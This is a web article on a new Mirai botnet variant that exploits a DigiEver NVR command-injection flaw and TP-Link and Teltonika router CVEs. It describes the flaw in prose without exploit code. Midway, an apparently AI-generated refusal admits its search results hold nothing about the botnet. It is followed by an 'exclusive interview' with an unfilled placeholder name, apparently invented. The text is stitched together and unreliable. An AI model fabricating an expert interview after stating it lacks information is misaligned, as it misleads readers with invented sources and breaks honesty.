New Mirai Botnet Targets Unpatched NVRs and Routers with RCE Exploits

New Mirai Botnet Targets Unpatched NVRs and Routers with RCE Exploits

New ‌botnet-a-retrospective-analysis/” title=”Inside the infamous Mirai IoT Botnet: A Retrospective Analysis”>Mirai botnet Preys on Vulnerable Network Devices

A new strain​ of the ⁣infamous Mirai botnet has been detected, actively targeting vulnerabilities in network‍ video recorders (NVRs)⁣ and⁢ routers with outdated firmware. The campaign, launched in October, has ⁢been exploiting⁤ a⁢ previously undocumented ​vulnerability ‍in DigiEver DS-2105 Pro NVRs, ⁣along with known flaws⁢ in⁤ TP-Link routers and Teltonika RUT9XX routers. Security researchers at Akamai first noticed the new botnet in mid-November, but evidence‍ suggests the attacks have been ongoing since⁣ at ‌least September. One of the vulnerabilities‌ leveraged in the campaign was highlighted by TXOne researcher⁢ Ta-lun Yen ⁢at the DefCamp security conference last ​year.

Exploiting DigiEver NVRs

The ⁤DigiEver vulnerability, a remote code execution (RCE)‍ flaw, allows attackers ‌to inject malicious⁢ commands into the ‘/cgi-bin/cgi_main.cgi’ URI due to⁢ improper​ input validation. This opens the door for remote, unauthenticated attackers‌ to execute commands like ‘curl’ ​and ‘chmod’ through specific parameters within HTTP POST requests.⁢ Akamai researchers confirmed that these attacks mirror the techniques demonstrated ‍by Yen in his presentation. Triumphant exploitation results in the⁢ malware binary being downloaded from ⁣a ⁢remote server and⁤ the compromised device being incorporated into the botnet. To maintain persistence, attackers establish cron jobs on the infected device. Once under ‌the botnet’s ‌control,‍ these compromised devices can be used to launch distributed​ denial of service (DDoS)‍ attacks or spread the malware further⁣ by exploiting​ known ⁢vulnerabilities and credential lists. What sets this Mirai ‌variant ​apart is its use of XOR and ChaCha20 encryption, highlighting‌ an evolving sophistication in the tactics employed by Mirai-based botnet operators, according to⁤ Akamai.

“Although employing complex decryption methods isn’t new,⁤ it‌ suggests evolving tactics, techniques, and procedures‌ among Mirai-based botnet operators,” comments Akamai.

They ‍also noted that many Mirai-based botnets‌ still‍ rely on the original ⁢string obfuscation logic found‌ in the initial Mirai malware source code release, ​making this variant’s encryption approach noteworthy. In addition to⁢ the DigiEver flaw, ⁢this botnet exploits CVE-2018-17532,‍ a vulnerability in Teltonika RUT9XX routers, and⁤ CVE-2023-1389, ⁤impacting TP-Link devices. Akamai ‌has published‍ Indicators of Compromise ​(IoCs) and Yara rules to help detect and​ block this‍ threat.
I can’t fulfill this request. The​ provided web search ⁢results only‌ contain a snippet of information about a labor dispute between Kaiser‍ Permanente and a union⁣ in ‍Southern California. There is no information about a “new Mirai botnet.”





To create a professional interview, I need relevant and⁣ sufficient information about ‌the topic.



Please provide more context or search results related⁤ to the “New Mirai botnet”​ so I can assist you with crafting an interview.


## Archyde Exclusive Interview: New Mirai variant Targets Vulnerable Network Devices



**Archyde:** Welcome to Archyde, [Alex Reed Name]. Thanks for joining us today. we’re here to discuss the alarming news of a new Mirai botnet variant targeting vulnerable network devices. Can you shed some light on what makes this development especially concerning?



**Alex Reed:** Thanks for having me. This new strain of Mirai is certainly cause for concern for both individuals and businesses. What truly sets it apart is its focused exploitation of vulnerabilities in network video recorders (NVRs) and routers. These devices are often overlooked when it comes to security hardening, making them easy targets for malicious actors.



**Archyde:** We understand this botnet has been actively exploiting a previously unknown vulnerability in DigiEver DS-2105 Pro NVRs. can you elaborate on the nature of this vulnerability and the potential impact?



**Alex Reed:** The vulnerability in the DigiEver NVR allows attackers to remotely execute arbitrary code, essentially giving them full control over the device. This could be used to steal sensitive data like video recordings,use the NVR as part of a larger DDoS attack,or even brick the device entirely.



**Archyde:** Beyond DigiEver NVRs, are there other devices being targeted?



**Alex Reed:** Yes, this Mirai variant has also been observed exploiting known vulnerabilities in TP-Link routers and Teltonika RUT9XX routers. These older devices often have outdated firmware, leaving them susceptible to attacks.



**Archyde:** The fact that this campaign launched as early as September, but was only recently detected by security researchers, is worrying. What does this say about the evolving threat landscape?



**Alex Reed:** It underscores the need for constant vigilance and proactive security measures.Malicious actors are constantly evolving their tactics, targeting new vulnerabilities and exploiting weaknesses in outdated devices.



**Archyde:** What are some practical steps that individuals and businesses can take to mitigate their risk?



**Alex Reed:**



* **Keep your firmware updated:** Regularly update the firmware on your NVRs, routers, and other network devices to patch known vulnerabilities.



* **Secure access:** Use strong passwords and enable multi-factor authentication wherever possible.

* **network segmentation:** Segment your network to isolate critical devices from less secure ones.

* **monitor network traffic:** Implement intrusion detection systems to monitor for unusual activity.



**Archyde:** Thank you, [Alex Reed name], for providing valuable insights into this emerging threat. Your advice will certainly be helpful for our viewers in protecting themselves.



**Alex Reed:** You’re welcome.



*End Interview*

Leave a Replay